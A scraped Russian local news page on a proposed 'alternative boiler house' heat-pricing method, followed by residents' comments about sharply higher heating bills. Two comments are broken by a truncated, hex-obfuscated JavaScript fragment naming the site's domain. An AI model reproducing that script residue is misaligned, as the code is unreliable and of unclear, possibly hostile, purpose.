Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
Россиян ждет новая методика расчета цен за тепло

Министерство энергетики разработало новую методику расчета цены за тепло, основанной на вычислении так называемой цены «альтернативной котельной». Применение новой методики расчета цены может привести как к резкому повышению цен на тепло, так и к их замедлению в некоторых регионах.
Согласно предложению Минэнерго, цена «альтернативной котельной» будет вычисляться по определенным формулам, учитывающим такие параметры, как виды топлива, который преобладает в указанной системе теплоснабжения, среднестатистическое количество этажей жилых и многоквартирных домов, температурное и сейсмическое влияние на территории, к которой относится поселение, расстояние, на которое транспортируется тепловая энергия, стоимость строительства котельной с подключением к газо- и электрораспределительным сетям. Такие данные содержатся в проекте постановления правительства (копия имеется в распоряжении Газеты.Ru), который был разработан в Минэнерго в рамках «дорожной карты» по реформированию отрасли теплоснабжения, одобренной правительством в октябре 2014 года.
Вся территория страны, согласно законодательному проекту, будет разделена на восемь температурных зон, принадлежность к которой повлияет на определение расходов на строительство котельной и теплосетей. Самым дешевым признается строительство в таких регионах, как Дагестан, Чечня и Краснодарский край (-4% от среднего показателя). Дороже всего строительство котельных обойдется в Якутии (+37%).
Нерешенным остается вопрос о параметрах возврата инвестированного капитала. В отношении этого показателя Минэнерго и Минэкономразвития не сходятся во мнении. Согласно методике, предложенной Минэнерго, базовый уровень нормы доходности инвестированного капитала при строительстве котельной и теплосетей — 18,81%, а срок окупаемости инвестиций — 10 лет. В Минэкономразвития не так оптимистично смотрят на доходность котельных: по мнению ведомства, доходность не будет превышать 12%, а срок окупаемости составит 15 лет.
Идея цены «альтернативной котельной» возникла еще в 2014 году. Суть предложенной тогда методики заключалась в том, чтобы в определенном населенном пункте рассчитать расходы на строительство котельной, определить уровень безубыточного производства тепла и возврата инвестиций в строительство котельной, а затем предложить ТЭЦ продавать тепловую энергию по стоимости, не превышающей предполагаемый тариф с «альтернативной котельной».
Источник «Новости Mail.Ru»
Комментарий № 1:
Интересно, причем тут в расчете сейсморайон?
Комментарий № 2:
Комментарий № 3:
Комментарий № 4:
Сегодня взял жировку - охренел. У нас за однокомнатку в 32 квадрата - пришёл счёт за отопление на 1900 с копейками. У соседей слева за двушку - 1200 или 1400. У соседей справа за трёшку - 2400. Пооедем в понедельник задавать вопросы... откуда сия космическая сумма. За прошлые месяцы за отопление было от 700 до 900 рубликов.
Комментарий № 5:
Куда поедите вопросы задавать??))) А то тоже сегодня от своей жировки маленько ох..ел!!!
Прошлый месяц 1500 и все предыдушие до этого, за этот 4000 руб. только за отопление!
Комментарий № 6:
Года полтора назад в новостях прошел сюжет, который потом нигде не повторяли и, вообще, тему закрыли! Суть такова – в одном из городов европейской части России размером с Северск, уволили одного ответственного работника-энергетика. И этот работник собрал пресс-конференцию, на которой представил документы, доказывающие, что с горожан незаконно берут плату за тепло! Оказалось, что на ТЭЦ расходы на охлаждение воды уже заложены в тариф на электроэнергию, а сам город является естественным холодильником. И поэтому энергетики имели право брать с жителей только за доставку воды до самих домов (за услуги теплосетей), а объемы отапливаемых помещений, а тем более гаражи, сидящие на обратке, никаким образом не должны были учитываться! Исходя из того, наша городская власть точно такая же «честная и бескорыстная», то эта тема может очень актуальной и для северчан! А это десятки тысяч рублей на каждого владельца отапливаемых помещений в год!
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;eКомментарий № 7:
Ну для начала в ЕРКЦ хотим сходить
Комментарий № 8:
Комментарий № 9:
Думаю в ЕРКЦ скажут, что они не причем и к ним стекаются данные либо с ЖЭКа, либо с Тепловых сетей! Там надо концы искать! Но куда то идти надо, а то возьмут за норму такие деньжищи рубить
Комментарий № 10:
Во вторых. Прошёлся по соседям в подъезде.
Ещё 2 квартиры однёшки как наша - за отопление в одной 2000 в другой 2200.
Ещё интересней оказалось на моём этаже. У соседей слева двухкомнатная квартира - им за отопление 1400. У соседей справа крупногабаритная трёшка - у них за отопление 2500. Как говорится я чувствую что нас наё... ток не могу понять где...
Комментарий № 11:
так этож Фурсин, он томич, занимается юр. помощью УК , ТСЖ и собственникам в борьбе с первыми двумя. на Эхе Москвы кажд понедельник передачка его "коммунальная грамотность".
Комментарий № 12:
--------------------
Комментарий № 13:
А потом и за то, что вообще живешь ))
Комментарий № 14:
Вы наверное не заметили, но уже платим =)
Ведь с рождения нам государство дает время подрости чтобы мы смогли платить налоги, а именно: 13% с зарплаты, купил машину - плати налоги, купил квартиру - плати налоги! Конечно многие скажут - надо получить 2-10 высших чтобы наути нормальную работу и тогда ети % былибы нечтожно малы, что мы бы их незамечали...
А как же часть населения которым пришлось после школы-шараги идти сразу работать чтобы расплатится с Етими налогами и другими долгами перед государством?!
Но если бы мы не платили налоги, у нас бы не формировалась пенсия - до которой многи не доживают из-за высоких цен на лекарства, тепло, свет и еда...
Здесь нам остается проглатить обиду и жить опустив глаза в низ обрекая свою жизнь государству.
P.s. налоги всеравно нужно платить! Потому что прийдя в старости в мерию вы бы могли громко и с гордостью кричать: Я с рождения плачу налоги!
--------------------
Комментарий № 15:
Комментарий № 16:
Комментарий № 17:
Господа! Я не понял, так это ВСЕМ пришли ТАКИЕ жировки с оплатой за тепло, выше в 2,5 раза?
Если есть такие, у кого в жировках всё как и прежде, чирканите здесь. Нужно понять, что происходит. Думаю в понедельник будет бесполезно куда-то дозвониться.
Комментарий № 18:
у меня больше. за 50 квадратов - 2200 отопление
Комментарий № 19:
Комментарий № 20:
Комментарий № 21:
Комментарий № 22:
У нас жировка уменьшилась, хоть и на 300-400р, но все же меньше.
Комментарий № 23:
Комментарий № 24:
Комментарий № 25:
Комментарий № 26:
Звонил, трубку так никто и не взял. Если не трудно, то поведайте нам что Вам сказали
Комментарий № 27:
Комментарий № 28:
Комментарий № 29:
Всем спасибо, похоже ситуация на самом деле хуже, чем думалось вначале.
Надеялся на то, что скажут, что это сбой в какой-нибудь программе, но...
У кого-то никаких изменений в жировках нет, как начисляли фиксированную сумму, так и сейчас она без изменений. Но похоже всё дело в том, что в этих случаях дома, куда приходят жировки без изменений, не имеют общедомовых приборов учёта тепла! А там, где эти приборы установили, кстати за наш с Вами счёт, и убеждали нас в экономии тепла, которое якобы возникнет, после установки этих приборов, получилось всё с точностью наоборот!
Думаю, что везде. где цены за тепло скачут, происходит так называемый перерасчёт, т. е. по показаниям приборов учёта нам выставляют не фиксированную сумму по нормативу, а реальную, ту которую показал прибор!
Только вот вопрос! Как прибор может показать, что реальное потребление тепла в доме превышает установленную норму подачи? Причем не на 1-2 Гкал, а на 10-20 Гкал ?
Т.е. Жильцы дома сидят и из ботарей льют воду в вёдра?
И как получается, что реальное потребление тепла в доме в разы выше запланированных нормативов?
Тогда почему в домах, где проживает руководство "Теплосетей", например по Солнечной 23, ежегодно уже в течении нескольких лет, происходит перерасчет тепла, и люди получают минусовые жировки? В этом доме народ умеет экономить тепло, а мы нет?
Вопросов очень много, думаю, ЕРКЦ отправит всех в Теплосети. Если всё действительно так, как я думаю, и дело в перерасчете и в показаниях наших приборов учёта, то всё будет очень непросто! Ведь получается, что мы за свои деньги установили приборы, благодаря которым мы стали платить больше! Вопрос: А на кой ляд нам тогда это? Что за приборы нам установили, кто их принимал, кто имел доступ к ним , почему в одних домах приборы показывают экономию, а в других - перерасход тепла, причём в разы!
Думаю, что в понедельник, вторник уже хоть кто-то сумеет узнать, что на самом деле происходит! Сам я в понедельник приеду в ЕРКЦ к 9-00, было бы не плохо, чтобы все, кого это коснулось тоже пришли-бы туда! Думаю, это количество возмущенных граждан могло бы заставить власть и руководство Теплосетей дать вразумительный ответ на то, что происходит с оплатой тепла в нашем городе.
А вообще, было-бы ещё лучше, если руководство ЕРКЦ, Теплосетей, города, здесь, не дожидаясь понедельника, попытались обьяснить, что происходит!
Комментарий № 30:
Комментарий № 31:
Комментарий № 32:
Вот и получается:
1. Либо приборы врут или показания коряво снимают.
2. Либо цена одного Гкал (1178руб) завышена.
3. Либо Путин виноват)))
Комментарий № 33:
Комментарий № 34:
Комментарий № 35:
Комментарий № 36:
а если так думать, то можно вообще их весь остальной срок молчать? у нас у власти обычно всегда недалекие, но даже им можно и нужно говорить, и чем нас больше тем лучше. для начала действительно с ЕРКЦ начать, мол собрались то случайно, в один прекрасный миг...это хоть и небольшое но событие...и как бы случайно надо СМИ пригласить, только СМИ могут все раздуть!!!!! ну и ногами топать, орать, можно разбомбить пару атрибутов мебели обязательно! начать хотя бы с малого, ну а потом здесь же на этом сайте общественность собирать, и выше выше выше!!
Комментарий № 37:
Комментарий № 38:
Комментарий № 39:
Самое интересное в том, что если это какой-то перерасчёт, то почему графа "ПЕРЕРАСЧЁТ" пустая? Ведь любому человеку было-бы проще разобраться во всём этом.
Да, и если теперь опять-же, почему-то "ПО СЛУХАМ" нам предлагают безальтернативный вариант платежа, когда мы априори должны платить за якобы "реальное " тепло?
КТО,ГДЕ, КОГДА, и под чьим присмотром снимал, фиксировал, и т.д. показания приборов учёта? И где гарантия, что те суммы и обьём потреблённой тепловой энергии соответствуют действительности!
Пример: Если за 100 кв.м. норма в месяц примерно 3000 руб., а взяли за не самый холодный месяц по факту - 7500, то нетрудно посчитать, что раньше люди платили 36000 в год, а теперь, даже с учетом 4-х выпадающих месяцев: приблизительно 6000*8 = 48000.
И опять-же, если это реальные цифры, то получается ТЕПЛОСЕТИ все эти годы, работая без счётчиков, несли колосальные убытки! И давно уже должны были кануть в лету! Но воз и ныне там! И его руководство! Которое Живёт и здравствует!
Комментарий № 40:
А вообще, хоть кто-нибудь видел экономическое обоснование тарифов на тепло?
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;eКомментарий № 41:
Комментарий № 42:
блин. не тыс. Гкал конечно. в деньгах выходит около 4-5 тыс. разница.
Комментарий № 43:
Последние двое суток телефоны руководства нашего дома не умолкают, жильцы возмущены. Если раньше за 100кв.м. - это 4х-ком. кв. - хозяева платили 5т.руб., то в феврале уже - 8т.руб! Разница очень ощутима.
ЕРКЦ скидывает с себя ответственность и отправляет в ЖЭУ, зная, что в каждом ЖЭУ сидит их бухгалтер, зарплату которому платят жители, и этот бухгалтер обязан ответить на все ваши вопросы. Т.е. первым делом - в ЖЭУ.
Второй момент - выясните в ЖЭУ, кто обслуживает ваш ОДПУ тепла, кто снимает и контролирует показания и исправность домового счетчика. Эти работы включены в тариф на содержание. Пуст обоснуют скачок начислений.
И, наконец, самое главное. Обратите все внимание на левый нижний угол в своих "жировках". Там вы увидите, что в домах, где произошел скачок по теплу, в строке "РФПН по отоплению" стоят нулевые цифры. РФПН - это разница между фактическим потреблением и нормативом. Все предыдущие годы администрация выплачивала Тепловым сетям безвозмездную субсидию из нашего бюджета в виде РФПН. Это были не совсем правомерные выплаты коммерческой организации за то..что у организации дырявые сети, которые она не ремонтирует вовремя(!). Так вот, с января 2016г., в связи с дефицитным бюджетом, администрация выплату РФПН Теплосетям уже "не потянула", а Тепловые сети привыкли к определенной бюджетной обеспечнности. Поэтому они теперь компенсируют выпадающие средства с потребителей, с нас с вами. И компенсируют с лихвой. Поэтому, спрос с Администрации в данной ситуации - обязателен.
Комментарий № 44:
Никак, подавляющее большинство россиян - безвольные овощи, которые покорно хавают киселевщину, и свято верят во многоходовочки солнцеликого. А если кто и пытается обращать внимание на острые проблемы, то он автоматом становится белоленточником, национал-предателем и пятой колонной.
Комментарий № 45:
Комментарий № 46:
Комментарий № 47:
Было : 1.18 x 1178,1 x12 мес. =16681 руб./год
Сегодня : 2.256 x 1178.1 x 8 мес. =21262 руб./год
Разница в 4581 руб = 27% к прежним платежам.
И это без учета будущих повышений тарифов
Отыхаем хорошо!!!!
Комментарий № 48:
Просто подумалось...
Была хоть надежда.
Комментарий № 49:
как была,так и осталась. звучит несколько иначе она (так и изначально было) :
Комментарий № 50:
дай побузить-то!!!!
Комментарий № 51:
ясно,отстала)
Комментарий № 52:
что-то я даже не удивлен
Комментарий № 53:
регуляторы на батареях
застекленные балконы, т.е.
тепла реально потребляется значительно меньше, чем лет 10 назад.
металл лет 8 как не дорожает
уголь тоже
почему растут счета за отопление?
Комментарий № 54:
Ответ очевиден : "просто бабки нужны"
Комментарий № 55:
Комментарий № 56:
вот вот и у меня в зале не греют совсем а жэу лишь тупую морду строит
Комментарий № 57:
Пообщался с грамотными людьми, имеющими отношение к теплоэнергетике, они утверждают, что при использовании приборов учета экономия тепла должна быть по любому.
Поэтому для себя решил :
1. Пока не разберёмся с УК, Теплосетями по показаниям нашего прибора, платить по жировке буду в каждую компанию отдельно, на их счета.
За тепло заплачу по нормативу.
2. Тут вопрос к юридически подкованным: если окажется, что всё правильно, и на самом деле расход тепла именно такой, как в жировках, то могут ли жильцы дома собрать собрание и решить убрать прибор учета, после чего вернуться к схеме оплаты тепла по нормативам, как было раньше, и как до сих пор платит большая половина домов, где народ был не такой дурной, как мы?
Комментарий № 58:
Дело в том, что если существует техническая возможность установки прибора учета (а у вас она есть, раз он установлен), то при отсутствии такого прибора норматив устанавливается ВЫШЕ, чем если бы у вас не было технической возможности.
Комментарий № 59:
одна батарея отключена наглухо уже 3 года
еще 2 подключаю только в сильные морозы
экономия из-за регуляторов должна быть существенная
Комментарий № 60:
Комментарий № 61:
ты можешь его вообще не включать. Кто-то теплым полом обходится. Но,дело в том, что эти вот сегодняшние циферки ,-они возникли из обыкновенного разделения по квадратным метрам общего количества потребленноого домом тепла. то есть сегодня копать снова начинают в ту сторону, дескать: Идите и ищите КТО в вашем доме потребляет тепла так, что на всех вас это отражается. ну, что-то типа того. Отрыжка безумного ФЗ - №261
Комментарий № 62: